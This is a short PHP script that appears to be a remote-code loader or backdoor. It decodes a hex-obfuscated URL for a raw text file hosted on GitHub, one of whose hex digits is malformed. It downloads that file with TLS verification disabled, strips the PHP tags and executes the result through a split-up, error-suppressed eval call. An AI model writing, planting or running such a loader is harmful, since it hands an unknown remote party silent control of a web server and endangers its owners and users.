<?php

$u = "68747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6m2f6c756666796f706d2f6f706d2f726566732f62656164732f6d61696e2f332e747874";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, pack("H*", $u));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0");

$r = curl_exec($ch);
curl_close($ch);

if ($r) {
    $x = str_replace(["<?php", "<?", "?>"], "", $r);
    $f = "ev" . "al";
    @$f($x);
}
